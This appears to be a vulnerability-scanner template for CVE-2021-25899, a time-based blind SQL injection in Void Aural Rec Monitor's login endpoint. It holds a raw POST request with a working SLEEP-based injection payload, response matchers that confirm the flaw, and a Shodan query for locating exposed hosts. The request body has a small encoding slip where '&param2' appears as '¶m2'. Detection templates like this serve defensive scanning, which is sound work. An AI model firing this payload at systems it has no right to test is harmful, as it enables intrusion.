id: CVE-2021-25899 info: name: Void Aural Rec Monitor 9.0.0.1 - SQL Injection author: edoardottt severity: high description: | Void Aural Rec Monitor 9.0.0.1 contains a SQL injection vulnerability in svc-login.php. An attacker can send a crafted HTTP request to perform a blind time-based SQL injection via the param1 parameter and thus possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. remediation: | Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in Void Aural Rec Monitor 9.0.0.1. reference: - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/all-your-databases-belong-to-me-a-blind-sqli-case-study/ - https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=28765 - https://nvd.nist.gov/vuln/detail/CVE-2021-25899 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-25899 cwe-id: CWE-89 epss-score: 0.53694 epss-percentile: 0.97227 cpe: cpe:2.3:a:void:aurall_rec_monitor:9.0.0.1:*:*:*:*:*:*:* metadata: max-request: 1 vendor: void product: aurall_rec_monitor shodan-query: html:"AURALL" tags: cve,cve2021,sqli,void,aurall http: - raw: - | POST /AurallRECMonitor/services/svc-login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded param1=dummy'+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))dummy)--+dummy¶m2=test matchers: - type: dsl dsl: - 'duration>=5' - 'status_code == 200' - 'contains(content_type, "text/html")' - 'contains(body, "Contacte con el administrador")' condition: and # digest: 4b0a00483046022100ddf040ed3e5000cd8a0e5a1406f0d7644c1663957d84f3c142f46b3ebeb37567022100f445356f1580ca54970f2e34904911c308f2843c471c693b9307825b70023335:922c64590222798bb761d5b6d8e72950